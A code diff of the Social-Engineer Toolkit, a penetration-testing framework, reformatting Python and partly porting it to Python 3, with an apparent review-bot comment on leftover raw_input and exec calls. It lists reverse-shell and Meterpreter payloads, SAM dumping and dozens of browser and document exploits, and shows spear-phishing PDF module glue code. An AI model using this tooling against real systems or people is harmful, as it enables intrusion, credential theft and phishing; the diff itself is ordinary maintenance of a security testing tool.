@ -62,16 +62,16 @@ webattack_menu = ['Java Applet Attack Method',
|
||||||
'Web Jacking Attack Method',
|
'Web Jacking Attack Method',
|
||||||
'Multi-Attack Web Method',
|
'Multi-Attack Web Method',
|
||||||
'Full Screen Attack Method',
|
'Full Screen Attack Method',
|
||||||
'HTA Attack Method',
|
'HTA Attack Method',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_menu = ['Microsoft SQL Bruter',
|
fasttrack_menu = ['Microsoft SQL Bruter',
|
||||||
'Custom Exploits',
|
'Custom Exploits',
|
||||||
'SCCM Attack Vector',
|
'SCCM Attack Vector',
|
||||||
'Dell DRAC/Chassis Default Checker',
|
'Dell DRAC/Chassis Default Checker',
|
||||||
'RID_ENUM - User Enumeration Attack',
|
'RID_ENUM - User Enumeration Attack',
|
||||||
'PSEXEC Powershell Injection',
|
'PSEXEC Powershell Injection',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_text = ("""
|
fasttrack_text = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
|
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
|
||||||
|
@ -81,12 +81,12 @@ completely rewritten and customized from scratch as to improve functionality and
|
||||||
""")
|
""")
|
||||||
|
|
||||||
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
|
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
|
||||||
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
|
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
|
||||||
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
|
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
|
||||||
'RDP | Use after Free - Denial of Service',
|
'RDP | Use after Free - Denial of Service',
|
||||||
'MySQL Authentication Bypass Exploit',
|
'MySQL Authentication Bypass Exploit',
|
||||||
'F5 Root Authentication Bypass Exploit',
|
'F5 Root Authentication Bypass Exploit',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_exploits_text1 = ("""
|
fasttrack_exploits_text1 = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
|
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
|
||||||
|
@ -94,8 +94,8 @@ menu has obscure exploits and ones that are primarily python driven. This will c
|
||||||
""")
|
""")
|
||||||
|
|
||||||
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
|
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
|
||||||
'Connect directly to MSSQL',
|
'Connect directly to MSSQL',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
fasttrack_mssql_text1 = ("""
|
fasttrack_mssql_text1 = ("""
|
||||||
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
|
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
|
||||||
|
@ -241,13 +241,13 @@ infectious_text = """
|
||||||
if operating_system != "windows":
|
if operating_system != "windows":
|
||||||
if msf_path != False:
|
if msf_path != False:
|
||||||
payload_menu_1 = [
|
payload_menu_1 = [
|
||||||
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
|
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
|
||||||
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
|
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
|
||||||
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
|
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
|
||||||
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
|
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
|
||||||
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
|
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
|
||||||
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
|
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
|
||||||
'Import your own executable Specify a path for your own executable\n']
|
'Import your own executable Specify a path for your own executable\n']
|
||||||
|
|
||||||
if operating_system == "windows" or msf_path == False:
|
if operating_system == "windows" or msf_path == False:
|
||||||
payload_menu_1 = [
|
payload_menu_1 = [
|
||||||
|
@ -264,17 +264,17 @@ What payload do you want to generate:
|
||||||
# used in gen_payload.py
|
# used in gen_payload.py
|
||||||
|
|
||||||
payload_menu_2 = [
|
payload_menu_2 = [
|
||||||
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
|
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
|
||||||
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
|
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
|
||||||
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
|
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
|
||||||
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
|
#'Windows Bind Shell Execute payload and create an accepting port on remote system.',
|
||||||
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
|
#'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
|
||||||
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
|
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
|
||||||
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
|
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
|
||||||
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
|
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
|
||||||
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
|
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
|
||||||
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
|
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
|
||||||
'Download/Run your Own Executable Downloads an executable and runs it\n'
|
'Download/Run your Own Executable Downloads an executable and runs it\n'
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@ -282,37 +282,37 @@ payload_menu_2_text = """\n"""
|
||||||
|
|
||||||
payload_menu_3_text = ""
|
payload_menu_3_text = ""
|
||||||
payload_menu_3 = [
|
payload_menu_3 = [
|
||||||
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
|
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
|
||||||
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
|
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
|
||||||
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
|
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
|
||||||
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
|
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
|
||||||
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
|
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
|
||||||
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
|
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
|
||||||
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
|
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
|
||||||
|
|
||||||
# called from create_payload.py associated dictionary = ms_attacks
|
# called from create_payload.py associated dictionary = ms_attacks
|
||||||
create_payloads_menu = [
|
create_payloads_menu = [
|
||||||
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
|
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
|
||||||
'SET Custom Written Document UNC LM SMB Capture Attack',
|
'SET Custom Written Document UNC LM SMB Capture Attack',
|
||||||
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
|
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
|
||||||
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
|
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
|
||||||
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
|
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
|
||||||
'Adobe Flash Player "Button" Remote Code Execution',
|
'Adobe Flash Player "Button" Remote Code Execution',
|
||||||
'Adobe CoolType SING Table "uniqueName" Overflow',
|
'Adobe CoolType SING Table "uniqueName" Overflow',
|
||||||
'Adobe Flash Player "newfunction" Invalid Pointer Use',
|
'Adobe Flash Player "newfunction" Invalid Pointer Use',
|
||||||
'Adobe Collab.collectEmailInfo Buffer Overflow',
|
'Adobe Collab.collectEmailInfo Buffer Overflow',
|
||||||
'Adobe Collab.getIcon Buffer Overflow',
|
'Adobe Collab.getIcon Buffer Overflow',
|
||||||
'Adobe JBIG2Decode Memory Corruption Exploit',
|
'Adobe JBIG2Decode Memory Corruption Exploit',
|
||||||
'Adobe PDF Embedded EXE Social Engineering',
|
'Adobe PDF Embedded EXE Social Engineering',
|
||||||
'Adobe util.printf() Buffer Overflow',
|
'Adobe util.printf() Buffer Overflow',
|
||||||
'Custom EXE to VBA (sent via RAR) (RAR required)',
|
'Custom EXE to VBA (sent via RAR) (RAR required)',
|
||||||
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
|
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
|
||||||
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
|
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
|
||||||
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
|
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
|
||||||
'Apple QuickTime PICT PnSize Buffer Overflow',
|
'Apple QuickTime PICT PnSize Buffer Overflow',
|
||||||
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
|
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
|
||||||
'Adobe Reader u3D Memory Corruption Vulnerability',
|
'Adobe Reader u3D Memory Corruption Vulnerability',
|
||||||
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
|
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
|
||||||
|
|
||||||
create_payloads_text = """
|
create_payloads_text = """
|
||||||
Select the file format exploit you want.
|
Select the file format exploit you want.
|
||||||
|
@ -320,52 +320,52 @@ create_payloads_text = """
|
||||||
********** PAYLOADS **********\n"""
|
********** PAYLOADS **********\n"""
|
||||||
|
|
||||||
browser_exploits_menu = [
|
browser_exploits_menu = [
|
||||||
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
|
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
|
||||||
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
|
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
|
||||||
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
|
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
|
||||||
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
|
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
|
||||||
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
|
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
|
||||||
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
|
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
|
||||||
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
|
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
|
||||||
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
|
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
|
||||||
'Java Applet JMX Remote Code Execution (2013-01-10)',
|
'Java Applet JMX Remote Code Execution (2013-01-10)',
|
||||||
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
|
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
|
||||||
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
|
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
|
||||||
'Java 7 Applet Remote Code Execution (2012-08-26)',
|
'Java 7 Applet Remote Code Execution (2012-08-26)',
|
||||||
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
|
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
|
||||||
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
|
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
|
||||||
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
|
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
|
||||||
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
|
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
|
||||||
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
|
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
|
||||||
'Adobe Flash Player Object Type Confusion (2012-05-04)',
|
'Adobe Flash Player Object Type Confusion (2012-05-04)',
|
||||||
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
|
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
|
||||||
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
|
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
|
||||||
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
|
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
|
||||||
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
|
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
|
||||||
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
|
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
|
||||||
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
|
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
|
||||||
'Internet Explorer CSS Import Use After Free (2010-11-29)',
|
'Internet Explorer CSS Import Use After Free (2010-11-29)',
|
||||||
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
|
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
|
||||||
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
|
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
|
||||||
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
|
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
|
||||||
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
|
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
|
||||||
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
|
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
|
||||||
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
|
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
|
||||||
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
|
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
|
||||||
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
|
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
|
||||||
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
|
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
|
||||||
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
|
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
|
||||||
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
|
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
|
||||||
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
|
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
|
||||||
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
|
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
|
||||||
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
|
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
|
||||||
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
|
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
|
||||||
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
|
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
|
||||||
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
|
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
|
||||||
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
|
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
|
||||||
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
|
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
|
||||||
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
|
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
|
||||||
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
|
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
|
||||||
|
|
||||||
browser_exploits_text = """
|
browser_exploits_text = """
|
||||||
Enter the browser exploit you would like to use [8]:
|
Enter the browser exploit you would like to use [8]:
|
||||||
|
@ -373,10 +373,10 @@ browser_exploits_text = """
|
||||||
|
|
||||||
# this is for the powershell attack vectors
|
# this is for the powershell attack vectors
|
||||||
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
|
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
|
||||||
'Powershell Reverse Shell',
|
'Powershell Reverse Shell',
|
||||||
'Powershell Bind Shell',
|
'Powershell Bind Shell',
|
||||||
'Powershell Dump SAM Database',
|
'Powershell Dump SAM Database',
|
||||||
'0D']
|
'0D']
|
||||||
|
|
||||||
powershell_text = ("""
|
powershell_text = ("""
|
||||||
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
|
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")
|
||||||
@ -1,6 +1,6 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
## module_handler.py
|
# module_handler.py
|
||||||
|
|
||||||
import glob
|
import glob
|
||||||
import re
|
import re
|
||||||
|
@ -14,9 +14,10 @@ menu_return = "false"
|
||||||
counter = 0
|
counter = 0
|
||||||
|
|
||||||
# get the menu going
|
# get the menu going
|
||||||
print "\n"
|
print("\n")
|
||||||
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
|
||||||
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
|
print_info_spaces(
|
||||||
|
"Please read the readme/modules.txt for information on how to create your own modules.\n")
|
||||||
|
|
||||||
for name in glob.glob("modules/*.py"):
|
for name in glob.glob("modules/*.py"):
|
||||||
|
|
||||||
|
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
|
||||||
line = line.replace('MAIN="', "")
|
line = line.replace('MAIN="', "")
|
||||||
line = line.replace('"', "")
|
line = line.replace('"', "")
|
||||||
line = " " + str(counter) + ". " + line
|
line = " " + str(counter) + ". " + line
|
||||||
print line
|
print(line)
|
||||||
|
|
||||||
print "\n 99. Return to the previous menu\n"
|
print("\n 99. Return to the previous menu\n")
|
||||||
choice = raw_input(setprompt(["9"], ""))
|
choice = raw_input(setprompt(["9"], ""))
|
||||||
|
|
||||||
if choice == 'exit':
|
if choice == 'exit':
|
||||||
|
@ -55,7 +56,7 @@ if menu_return == "false":
|
||||||
# pull any files in the modules directory that starts with .py
|
# pull any files in the modules directory that starts with .py
|
||||||
for name in glob.glob("modules/*.py"):
|
for name in glob.glob("modules/*.py"):
|
||||||
|
|
||||||
counter = counter+1
|
counter = counter + 1
|
||||||
|
|
||||||
if counter == int(choice):
|
if counter == int(choice):
|
||||||
# get rid of .modules extension
|
# get rid of .modules extension
|
||||||
|
@ -76,6 +77,6 @@ if menu_return == "false":
|
||||||
try:
|
try:
|
||||||
exec("%s.main()" % (name))
|
exec("%s.main()" % (name))
|
||||||
# handle the exception if main isn't there
|
# handle the exception if main isn't there
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
raw_input(" [!] There was an issue with a module: %s." % (e))
|
raw_input(" [!] There was an issue with a module: %s." % (e))
|
||||||
return_continue()
|
return_continue()
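Review bot: `raw_input` on the `choice = raw_input(setprompt(["9"], ""))` line (hunk @ -30,9 +31,9) and on the `raw_input(" [!] There was an issue with a module: %s." % (e))` line (hunk @ -76,6 +77,6) survives the Python 3 conversion, so once `print` is a function these two lines still raise NameError on Python 3, where the builtin is `input`. If the file must keep running on Python 2 as well, a shim near the top of the module, `try: input = raw_input` / `except NameError: pass`, keeps both interpreters working; otherwise change the calls to `input(...)`. Separately, `exec("%s.main()" % (name))` builds executable source from a name derived from `glob.glob("modules/*.py")`; whatever binds `name` is outside this hunk, but if it is a module path string, `importlib.import_module(name).main()` runs the same entry point without string-assembled code and is easier to audit. The `except Exception as e` around it also swallows every failure raised inside the module's own `main`, not only the missing-`main` case the comment describes; catching `AttributeError` for that case and letting other exceptions surface would stop module bugs from being reported as "an issue with a module".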
|
||||||
@ -1,5 +1,5 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
## PDF spear phishing attack here
|
# PDF spear phishing attack here
|
||||||
|
|
||||||
import subprocess
|
import subprocess
|
||||||
import re
|
import re
|
||||||
|
@ -13,50 +13,52 @@ from src.core.dictionaries import *
|
||||||
from src.core.menu.text import *
|
from src.core.menu.text import *
|
||||||
|
|
||||||
me = mod_name()
|
me = mod_name()
|
||||||
definepath=os.getcwd()
|
definepath = os.getcwd()
|
||||||
define_version = get_version()
|
define_version = get_version()
|
||||||
users_home = os.getenv("HOME")
|
users_home = os.getenv("HOME")
|
||||||
|
|
||||||
# metasploit path
|
# metasploit path
|
||||||
meta_path=meta_path()
|
meta_path = meta_path()
|
||||||
|
|
||||||
print meta_path
|
print(meta_path)
|
||||||
|
|
||||||
# define if we need apache or not for dll hijacking
|
# define if we need apache or not for dll hijacking
|
||||||
# define if use apache or not
|
# define if use apache or not
|
||||||
apache=0
|
apache = 0
|
||||||
|
|
||||||
# open set_config
|
# open set_config
|
||||||
apache_check=file("/etc/setoolkit/set.config","r").readlines()
|
apache_check = file("/etc/setoolkit/set.config", "r").readlines()
|
||||||
|
|
||||||
# loop this guy to search for the APACHE_SERVER config variable
|
# loop this guy to search for the APACHE_SERVER config variable
|
||||||
for line in apache_check:
|
for line in apache_check:
|
||||||
# strip \r\n
|
# strip \r\n
|
||||||
line=line.rstrip()
|
line = line.rstrip()
|
||||||
# if apache is turned on get things ready
|
# if apache is turned on get things ready
|
||||||
match=re.search("APACHE_SERVER=ON",line)
|
match = re.search("APACHE_SERVER=ON", line)
|
||||||
# if its on lets get apache ready
|
# if its on lets get apache ready
|
||||||
if match:
|
if match:
|
||||||
for line2 in apache_check:
|
for line2 in apache_check:
|
||||||
# set the apache path here
|
# set the apache path here
|
||||||
match2=re.search("APACHE_DIRECTORY=", line2)
|
match2 = re.search("APACHE_DIRECTORY=", line2)
|
||||||
if match2:
|
if match2:
|
||||||
line2=line2.rstrip()
|
line2 = line2.rstrip()
|
||||||
apache_path=line2.replace("APACHE_DIRECTORY=","")
|
apache_path = line2.replace("APACHE_DIRECTORY=", "")
|
||||||
apache=1
|
apache = 1
|
||||||
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
|
if os.path.isdir(apache_path + "/html"):
|
||||||
|
apache_path = apache_path + "/html"
|
||||||
|
|
||||||
###################################################
|
###################################################
|
||||||
# USER INPUT: SHOW PAYLOAD MENU #
|
# USER INPUT: SHOW PAYLOAD MENU #
|
||||||
###################################################
|
###################################################
|
||||||
inputpdf=""
|
inputpdf = ""
|
||||||
target=""
|
target = ""
|
||||||
exploit = "INVALID"
|
exploit = "INVALID"
|
||||||
while exploit == "INVALID":
|
while exploit == "INVALID":
|
||||||
debug_msg(me,"printing 'src.core.menu.text.create_payloads_menu'",5)
|
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
|
||||||
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
|
show_payload_menu1 = create_menu(
|
||||||
|
create_payloads_text, create_payloads_menu)
|
||||||
exploit = raw_input(setprompt(["4"], ""))
|
exploit = raw_input(setprompt(["4"], ""))
|
||||||
print "\n"
|
print("\n")
|
||||||
|
|
||||||
# Do conditional checks for the value of 'exploit', which should be a number
|
# Do conditional checks for the value of 'exploit', which should be a number
|
||||||
# Handle any additional tasks before doing the dictionary lookup and
|
# Handle any additional tasks before doing the dictionary lookup and
|
||||||
|
@ -67,37 +69,40 @@ while exploit == "INVALID":
|
||||||
exit_set()
|
exit_set()
|
||||||
|
|
||||||
if exploit == "":
|
if exploit == "":
|
||||||
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
|
||||||
|
exploit = '1'
|
||||||
|
|
||||||
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
|
||||||
outfile=("template.doc")
|
outfile = ("template.doc")
|
||||||
|
|
||||||
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
|
||||||
outfile=("template.rtf")
|
if exploit == '4':
|
||||||
target=("TARGET=1")
|
outfile = ("template.rtf")
|
||||||
|
target = ("TARGET=1")
|
||||||
|
|
||||||
if exploit == "5":
|
if exploit == "5":
|
||||||
outfile = ("template.mov")
|
outfile = ("template.mov")
|
||||||
|
|
||||||
if exploit != '3' and exploit != '4' and exploit !="17":
|
if exploit != '3' and exploit != '4' and exploit != "17":
|
||||||
outfile=("template.pdf")
|
outfile = ("template.pdf")
|
||||||
|
|
||||||
|
debug_msg(me, 'current input was read as: %s' % exploit, 3)
|
||||||
debug_msg(me,'current input was read as: %s' % exploit,3)
|
exploit = ms_attacks(exploit)
|
||||||
exploit=ms_attacks(exploit)
|
debug_msg(me, 'value was translated to: %s' % exploit, 3)
|
||||||
debug_msg(me,'value was translated to: %s' % exploit,3)
|
|
||||||
|
|
||||||
if exploit == "INVALID":
|
if exploit == "INVALID":
|
||||||
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
|
print_warning(
|
||||||
|
"that choice is invalid...please try again or press ctrl-c to Cancel.")
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
|
|
||||||
# 'exploit' has been converted to the string by now, so we need to
|
# 'exploit' has been converted to the string by now, so we need to
|
||||||
# evaluate the string instead of the user input number from here on...
|
# evaluate the string instead of the user input number from here on...
|
||||||
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
|
||||||
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
|
print_info(
